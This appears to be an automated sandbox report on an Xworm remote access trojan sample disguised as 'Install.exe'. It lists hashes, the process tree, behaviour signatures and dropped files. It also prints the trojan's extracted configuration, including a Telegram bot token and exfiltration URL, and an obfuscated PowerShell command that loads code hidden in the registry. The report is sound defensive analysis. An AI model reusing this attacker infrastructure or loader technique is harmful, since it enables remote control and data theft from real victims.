Overview

overview

10

Static

static

3

Install.exe

windows7-x64

10

Install.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    16s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    14-12-2024 12:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Install.exe

  • Size

    259KB

  • MD5

    28db4677dcbbaa0a4c5adbc02c9da4f3

  • SHA1

    e1f0199ed131a90e25204399e4e876da64ea3ba5

  • SHA256

    b871ed20d46a9be3a4aedb5facad152ab24289b6866076cb7ffc59721ca7525c

  • SHA512

    718ad88f930160a83c59d9f73d41cf4ea76de3c929956bffb618631d6450b7f59d4b2eb62afa59eff29461b256c402d387df9fdadee9a1a9d1b5e65cea45de52

  • SSDEEP

    6144:ByHp/aGMFlSShM00Iyew/2xrvhwCS9KSyiIBov:IJ/pFJIyN/2RbhHiIS

Score
10/10
xwormdiscoveryevasionexecutionrattrojan

Malware Config

Extracted

Family

xworm

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    ntoskrnl.exe

  • pastebin_url

    https://pastebin.com/raw/Zx6DUkf9

  • telegram

    https://api.telegram.org/bot6521061783:AAG8RBSc5RacffL-i60qrqMJYo0j7RajlZI/sendMessage?chat_id=5999137434

Signatures

  • Detect Xworm Payload 2 IoCs
  • Modifies security service 2 TTPs 2 IoCs
    evasion
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Executes dropped EXE 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 47 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:428
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{46aabffe-6c3c-4a8a-b8de-152b22aa5203}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2256
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
        PID:472
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch
          2⤵
            PID:604
            • C:\Windows\system32\DllHost.exe
              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
              3⤵
                PID:1248
              • C:\Windows\system32\wbem\wmiprvse.exe
                C:\Windows\system32\wbem\wmiprvse.exe
                3⤵
                  PID:808
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k RPCSS
                2⤵
                  PID:688
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                  2⤵
                  • Modifies security service
                  PID:760
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
                  2⤵
                    PID:832
                    • C:\Windows\system32\Dwm.exe
                      "C:\Windows\system32\Dwm.exe"
                      3⤵
                        PID:1116
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs
                      2⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:872
                      • C:\Windows\system32\taskeng.exe
                        taskeng.exe {8AD3C138-69CC-4169-AC89-41221F50EEDA} S-1-5-18:NT AUTHORITY\System:Service:
                        3⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2804
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+'F'+''+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+'E').GetValue(''+'$'+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+[Char](116)+'ag'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                          4⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:2548
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalService
                      2⤵
                        PID:976
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k NetworkService
                        2⤵
                          PID:292
                        • C:\Windows\system32\taskhost.exe
                          "taskhost.exe"
                          2⤵
                            PID:1060
                          • C:\Windows\System32\spoolsv.exe
                            C:\Windows\System32\spoolsv.exe
                            2⤵
                              PID:1068
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                              2⤵
                                PID:1148
                              • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
                                "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
                                2⤵
                                  PID:1516
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
                                  2⤵
                                    PID:3024
                                  • C:\Windows\system32\sppsvc.exe
                                    C:\Windows\system32\sppsvc.exe
                                    2⤵
                                      PID:2520
                                  • C:\Windows\system32\lsass.exe
                                    C:\Windows\system32\lsass.exe
                                    1⤵
                                      PID:488
                                    • C:\Windows\system32\lsm.exe
                                      C:\Windows\system32\lsm.exe
                                      1⤵
                                        PID:496
                                      • C:\Windows\Explorer.EXE
                                        C:\Windows\Explorer.EXE
                                        1⤵
                                          PID:1180
                                          • C:\Users\Admin\AppData\Local\Temp\Install.exe
                                            "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                                            2⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:2780
                                            • C:\ProgramData\Install.exe
                                              "C:\ProgramData\Install.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • System Location Discovery: System Language Discovery
                                              PID:2816
                                            • C:\ProgramData\KrnlSetupSus.exe
                                              "C:\ProgramData\KrnlSetupSus.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2476
                                        • C:\Windows\system32\conhost.exe
                                          \??\C:\Windows\system32\conhost.exe "411634670769012180-9945174621076244156-1708637318877458642-1920068509424622011"
                                          1⤵
                                            PID:2556

                                          Network

                                          MITRE ATT&CK Enterprise v15

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • C:\ProgramData\Install.exe
                                            Filesize

                                            162KB

                                            MD5

                                            b5f6c9ac3389f5e61b4c750cf950e27c

                                            SHA1

                                            dbe0cca47ab36938ed022311f97736fc2915ff06

                                            SHA256

                                            bd4062e261a7ac5893e95a88d79564b44aad58ca446c3649a50589415b64d098

                                            SHA512

                                            014f187b94012f0a5077908107a7b0f3c7efae9edf1a6ea7c395e387830e2fe84105a12ea8446311e0fc25fbe2790f56b614c9726507a22fee7baa46b2c4487c

                                            Download Submit

                                          • C:\ProgramData\KrnlSetupSus.exe
                                            Filesize

                                            85KB

                                            MD5

                                            6435792d63be630506eb9eebbd1e3878

                                            SHA1

                                            37f7023b735b3f8cd65803bc704ad529f896ff4a

                                            SHA256

                                            dc4f64ba228c5d301a8d64bd8c172b45779583375d3c1be3c83c3cd1c7d2a5e3

                                            SHA512

                                            88af5a007d8d21b057740f42ebea3c4fe529924637b2c6b027ed520905ee8445f6b70d7a069457f82134e2c4405b0641f7620adccd8abb1c2ca1dd62cd127955

                                            Download Submit

                                          • memory/428-42-0x0000000000BB0000-0x0000000000BDA000-memory.dmp

                                            Filesize

                                            168KB

                                            Download

                                          • memory/428-39-0x0000000000BB0000-0x0000000000BDA000-memory.dmp

                                            Filesize

                                            168KB

                                            Download

                                          • memory/428-40-0x0000000000BB0000-0x0000000000BDA000-memory.dmp

                                            Filesize

                                            168KB

                                            Download

                                          • memory/428-41-0x0000000000BB0000-0x0000000000BDA000-memory.dmp

                                            Filesize

                                            168KB

                                            Download

                                          • memory/428-32-0x0000000000B80000-0x0000000000BA4000-memory.dmp

                                            Filesize

                                            144KB

                                            Download

                                          • memory/428-43-0x0000000000BB0000-0x0000000000BDA000-memory.dmp

                                            Filesize

                                            168KB

                                            Download

                                          • memory/428-44-0x000007FEBF6D0000-0x000007FEBF6E0000-memory.dmp

                                            Filesize

                                            64KB

                                            Download

                                          • memory/428-45-0x00000000374B0000-0x00000000374C0000-memory.dmp

                                            Filesize

                                            64KB

                                            Download

                                          • memory/428-34-0x0000000000BB0000-0x0000000000BDA000-memory.dmp

                                            Filesize

                                            168KB

                                            Download

                                          • memory/428-33-0x0000000000BB0000-0x0000000000BDA000-memory.dmp

                                            Filesize

                                            168KB

                                            Download

                                          • memory/428-30-0x0000000000B80000-0x0000000000BA4000-memory.dmp

                                            Filesize

                                            144KB

                                            Download

                                          • memory/472-65-0x000007FEBF6D0000-0x000007FEBF6E0000-memory.dmp

                                            Filesize

                                            64KB

                                            Download

                                          • memory/472-61-0x0000000000100000-0x000000000012A000-memory.dmp

                                            Filesize

                                            168KB

                                            Download

                                          • memory/472-62-0x0000000000100000-0x000000000012A000-memory.dmp

                                            Filesize

                                            168KB

                                            Download

                                          • memory/472-63-0x0000000000100000-0x000000000012A000-memory.dmp

                                            Filesize

                                            168KB

                                            Download

                                          • memory/472-64-0x0000000000100000-0x000000000012A000-memory.dmp

                                            Filesize

                                            168KB

                                            Download

                                          • memory/472-66-0x00000000374B0000-0x00000000374C0000-memory.dmp

                                            Filesize

                                            64KB

                                            Download

                                          • memory/472-60-0x0000000000100000-0x000000000012A000-memory.dmp

                                            Filesize

                                            168KB

                                            Download

                                          • memory/472-55-0x0000000000100000-0x000000000012A000-memory.dmp

                                            Filesize

                                            168KB

                                            Download

                                          • memory/488-73-0x0000000000240000-0x000000000026A000-memory.dmp

                                            Filesize

                                            168KB

                                            Download

                                          • memory/488-79-0x00000000374B0000-0x00000000374C0000-memory.dmp

                                            Filesize

                                            64KB

                                            Download

                                          • memory/488-77-0x0000000000240000-0x000000000026A000-memory.dmp

                                            Filesize

                                            168KB

                                            Download

                                          • memory/488-78-0x000007FEBF6D0000-0x000007FEBF6E0000-memory.dmp

                                            Filesize

                                            64KB

                                            Download

                                          • memory/488-68-0x0000000000240000-0x000000000026A000-memory.dmp

                                            Filesize

                                            168KB

                                            Download

                                          • memory/488-75-0x0000000000240000-0x000000000026A000-memory.dmp

                                            Filesize

                                            168KB

                                            Download

                                          • memory/488-76-0x0000000000240000-0x000000000026A000-memory.dmp

                                            Filesize

                                            168KB

                                            Download

                                          • memory/488-74-0x0000000000240000-0x000000000026A000-memory.dmp

                                            Filesize

                                            168KB

                                            Download

                                          • memory/2256-19-0x0000000140000000-0x0000000140008000-memory.dmp

                                            Filesize

                                            32KB

                                            Download

                                          • memory/2256-25-0x0000000077470000-0x0000000077619000-memory.dmp

                                            Filesize

                                            1.7MB

                                            Download

                                          • memory/2256-26-0x0000000077250000-0x000000007736F000-memory.dmp

                                            Filesize

                                            1.1MB

                                            Download

                                          • memory/2256-27-0x0000000140000000-0x0000000140008000-memory.dmp

                                            Filesize

                                            32KB

                                            Download

                                          • memory/2256-20-0x0000000140000000-0x0000000140008000-memory.dmp

                                            Filesize

                                            32KB

                                            Download

                                          • memory/2256-24-0x0000000140000000-0x0000000140008000-memory.dmp

                                            Filesize

                                            32KB

                                            Download

                                          • memory/2256-22-0x0000000140000000-0x0000000140008000-memory.dmp

                                            Filesize

                                            32KB

                                            Download

                                          • memory/2256-21-0x0000000140000000-0x0000000140008000-memory.dmp

                                            Filesize

                                            32KB

                                            Download

                                          • memory/2476-13-0x000007FEF5D10000-0x000007FEF66FC000-memory.dmp

                                            Filesize

                                            9.9MB

                                            Download

                                          • memory/2476-12-0x0000000001320000-0x000000000133C000-memory.dmp

                                            Filesize

                                            112KB

                                            Download

                                          • memory/2476-212-0x000007FEF5D10000-0x000007FEF66FC000-memory.dmp

                                            Filesize

                                            9.9MB

                                            Download

                                          • memory/2548-14-0x0000000019F70000-0x000000001A252000-memory.dmp

                                            Filesize

                                            2.9MB

                                            Download

                                          • memory/2548-15-0x0000000001370000-0x0000000001378000-memory.dmp

                                            Filesize

                                            32KB

                                            Download

                                          • memory/2548-16-0x000000001A360000-0x000000001A38A000-memory.dmp

                                            Filesize

                                            168KB

                                            Download

                                          • memory/2548-18-0x0000000077250000-0x000000007736F000-memory.dmp

                                            Filesize

                                            1.1MB

                                            Download

                                          • memory/2548-17-0x0000000077470000-0x0000000077619000-memory.dmp

                                            Filesize

                                            1.7MB

                                            Download

                                          • memory/2780-0-0x000007FEF5D13000-0x000007FEF5D14000-memory.dmp

                                            Filesize

                                            4KB

                                            Download

                                          • memory/2780-1-0x0000000000C40000-0x0000000000C88000-memory.dmp

                                            Filesize

                                            288KB

                                            Download